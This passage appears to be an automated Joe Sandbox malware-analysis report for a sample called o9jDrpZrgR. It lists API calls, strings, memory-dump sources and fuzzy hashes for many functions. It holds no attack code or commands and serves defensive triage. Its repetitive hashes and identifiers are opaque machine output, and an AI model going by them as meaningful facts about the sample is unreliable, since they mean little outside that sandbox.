                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0089F844
                                                              • IsDebuggerPresent.KERNEL32 ref: 0089F910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0089F930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0089F93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,0089E5E8,0000001C,0089E7DD,00000000,?,?,?,?,?,?,?,0089E5E8,00000004,008E1CEC,0089E86D), ref: 0089E6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0089E5E8,00000004,008E1CEC,0089E86D), ref: 0089E6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 008A8FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 008A8FBF
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 008A8FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0089AF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,008BE72C,?,?), ref: 0089AF84
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(00886DDF,00000000,00000400), ref: 00886C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00886C95
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008B19EF,?,?,00000008,?,?,008B168F,00000000), ref: 008B1C21
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0089F66A
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0088B16B
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0089F3A5), ref: 0089F9DA
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction ID: 2dde91d3eab7fd13303090221f26e77c1d06b89206d2e0484e99812e792f12ab
                                                              • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                              • Instruction Fuzzy Hash: E0523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 002c2d9a827dac7c59a6c382ecfde20e9c79b7834ce2e82c4f0ddb1a73874b03
                                                              • Instruction ID: 2f8b47aaac070bef61a96ff0f5d5dc41f205828faf966684a6557fc98d7e76e5
                                                              • Opcode Fuzzy Hash: 002c2d9a827dac7c59a6c382ecfde20e9c79b7834ce2e82c4f0ddb1a73874b03
                                                              • Instruction Fuzzy Hash: 2812C2B16287069FCB18DF28C490A79B7E0FF94308F18492EE997C7781E334A995DB45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daeae3e3bd827b579852567c6450e8505b68033da15ac91cbb15ced0c95b32bd
                                                              • Instruction ID: f78f6486fa5e7c869e1dbd397f83aea012e131a6daa1cdc6f03c03212f471dd9
                                                              • Opcode Fuzzy Hash: daeae3e3bd827b579852567c6450e8505b68033da15ac91cbb15ced0c95b32bd
                                                              • Instruction Fuzzy Hash: 3FF19E716083058FC754EF28C88462ABBE5FFDA318F144A6EF485D725AE730E945CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: bead7fccc9e57a0ed041a5437c30ca538246373d8e308b151ba7e3b2219b32b0
                                                              • Instruction ID: 61a0348beb2082d093df73795647173bbd532f28b39ae07a93455ad718133243
                                                              • Opcode Fuzzy Hash: bead7fccc9e57a0ed041a5437c30ca538246373d8e308b151ba7e3b2219b32b0
                                                              • Instruction Fuzzy Hash: D8D19FB1A083458FDF14EF28C88475ABBE1FF89308F18456DE889DB242E774E915CB56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0088E30E
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                                • Part of subcall function 00891DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008C1030,00000200,0088D928,00000000,?,00000050,008C1030), ref: 00891DC4
                                                              • _strlen.LIBCMT ref: 0088E32F
                                                              • SetDlgItemTextW.USER32(?,008BE274,?), ref: 0088E38F
                                                              • GetWindowRect.USER32(?,?), ref: 0088E3C9
                                                              • GetClientRect.USER32(?,?), ref: 0088E3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0088E475
                                                              • GetWindowRect.USER32(?,?), ref: 0088E4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 0088E4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 0088E4E3
                                                              • GetWindow.USER32(?,00000005), ref: 0088E4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0088E51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 0088E58D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d
                                                              • API String ID: 2407758923-2512411981
                                                              • Opcode ID: fd67306fefb3e357cf4dceb01830344d7eb25e0388d146c263a9fae8d4db07f7
                                                              • Instruction ID: 8d483ac0a403a70fae4a8a48fa61079cba1403006fbea7b6e30ccef5ec922c93
                                                              • Opcode Fuzzy Hash: fd67306fefb3e357cf4dceb01830344d7eb25e0388d146c263a9fae8d4db07f7
                                                              • Instruction Fuzzy Hash: 2C818172208341AFD710EFA8CD89A6FBBE9FB89704F04091DFA85D7250D675ED058B52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 008ACB66
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC71E
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC730
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC742
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC754
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC766
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC778
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC78A
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC79C
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7AE
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7C0
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7D2
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7E4
                                                                • Part of subcall function 008AC701: _free.LIBCMT ref: 008AC7F6
                                                              • _free.LIBCMT ref: 008ACB5B
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008ACB7D
                                                              • _free.LIBCMT ref: 008ACB92
                                                              • _free.LIBCMT ref: 008ACB9D
                                                              • _free.LIBCMT ref: 008ACBBF
                                                              • _free.LIBCMT ref: 008ACBD2
                                                              • _free.LIBCMT ref: 008ACBE0
                                                              • _free.LIBCMT ref: 008ACBEB
                                                              • _free.LIBCMT ref: 008ACC23
                                                              • _free.LIBCMT ref: 008ACC2A
                                                              • _free.LIBCMT ref: 008ACC47
                                                              • _free.LIBCMT ref: 008ACC5F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 27e4672736b868c6c3d72f6dec6c0238c042b11b7324117e32e5f36829b8a51c
                                                              • Instruction ID: 804a664a848bb88e5bdf5d366209abf5fe854f69ed4d29a6b9920f215fb4be87
                                                              • Opcode Fuzzy Hash: 27e4672736b868c6c3d72f6dec6c0238c042b11b7324117e32e5f36829b8a51c
                                                              • Instruction Fuzzy Hash: A3314B71600205DFFB20AA3DD846B9AB7E9FF12360F105429E298D7A92DF71EC41CB21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 0089D6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0089D6ED
                                                                • Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0089D709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0089D720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0089D734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0089D75D
                                                              • DeleteObject.GDI32(00000000), ref: 0089D764
                                                              • GetWindow.USER32(00000000,00000002), ref: 0089D76D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: fd3bfa4dc705ee8088ba5851acf51e5f675e509867fab4776eb100f7cda5f569
                                                              • Instruction ID: 15ebadff890a87e9013cc79f6ddb396d5477435d85942dd5972b7a83eaae9188
                                                              • Opcode Fuzzy Hash: fd3bfa4dc705ee8088ba5851acf51e5f675e509867fab4776eb100f7cda5f569
                                                              • Instruction Fuzzy Hash: 231121322447507BEA21BBB49CCEFAF765CFB50751F098120FA51EA092DA64CE0542AA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008A9705
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008A9711
                                                              • _free.LIBCMT ref: 008A971C
                                                              • _free.LIBCMT ref: 008A9727
                                                              • _free.LIBCMT ref: 008A9732
                                                              • _free.LIBCMT ref: 008A973D
                                                              • _free.LIBCMT ref: 008A9748
                                                              • _free.LIBCMT ref: 008A9753
                                                              • _free.LIBCMT ref: 008A975E
                                                              • _free.LIBCMT ref: 008A976C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d434dc3ddb3378fe5ba016464860b281e8e3d14ee8ff78e30490fb4ff7f374f3
                                                              • Instruction ID: 960c622ca857e33f3dfd0873db6cdf748cd03ce8d45f4f7c7da7b71f57d7f7c3
                                                              • Opcode Fuzzy Hash: d434dc3ddb3378fe5ba016464860b281e8e3d14ee8ff78e30490fb4ff7f374f3
                                                              • Instruction Fuzzy Hash: 2811D4B6500009EFEB01EFA8C842CD93BB5FF15390B4150A0FB088FA62DE32DA509B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: ea3d9829c291a9878fde1bb86c769fdae3ac39481250986d3748a6d5023df64a
                                                              • Instruction ID: e46f311bc5ad5260f530c04c4e6a479d64907c307629b1f98872fbb66f5a8fc3
                                                              • Opcode Fuzzy Hash: ea3d9829c291a9878fde1bb86c769fdae3ac39481250986d3748a6d5023df64a
                                                              • Instruction Fuzzy Hash: 64B18F71800219EFEF25DFA8C8819AEB7B5FF16310F14415AF811ABA12D735EA51CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00886FAA
                                                              • _wcslen.LIBCMT ref: 00887013
                                                              • _wcslen.LIBCMT ref: 00887084
                                                                • Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
                                                                • Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
                                                                • Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: 07bd88dd018ec901b175bae6dd242e871e935307d03302930bb286df362498db
                                                              • Instruction ID: 52eaa80bac8aed52205572b7af367f78171a8dca0c12fcf00bc2c0867a0f9175
                                                              • Opcode Fuzzy Hash: 07bd88dd018ec901b175bae6dd242e871e935307d03302930bb286df362498db
                                                              • Instruction Fuzzy Hash: 3741E5B1D08744AAEB20F7789C86FEE777CFF15304F140455FA55E6282D674AA888722
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00899736
                                                              • _wcslen.LIBCMT ref: 008997D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 008997E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00899806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1116704506-4209811716
                                                              • Opcode ID: af0bacc88985ddcc93b4179eba9a939ef978625b76d45f5bf0607d3ba0fee159
                                                              • Instruction ID: fafa6d481c06eac0908c0dfabd5988e175348f2b15620a5d9d4e283d68ad442c
                                                              • Opcode Fuzzy Hash: af0bacc88985ddcc93b4179eba9a939ef978625b76d45f5bf0607d3ba0fee159
                                                              • Instruction Fuzzy Hash: BB3115325087017AEB25BF6C9C46FAB779CFF52320F18011DF551E66D2EB649A0883A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089B610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0089B637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0089B650
                                                              • SetWindowTextW.USER32(?,?), ref: 0089B661
                                                              • GetDlgItem.USER32(?,00000065), ref: 0089B66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0089B67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0089B694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 31fc97af8cde5a9da841bc7f1052923402fe0c88cec3153d5d3ddc4cedc70ffd
                                                              • Instruction ID: 2eed8b4fe44ef66d0edc37a24fb06d5782a91cef9c1b2426bd6b6a6b2e4a6cc1
                                                              • Opcode Fuzzy Hash: 31fc97af8cde5a9da841bc7f1052923402fe0c88cec3153d5d3ddc4cedc70ffd
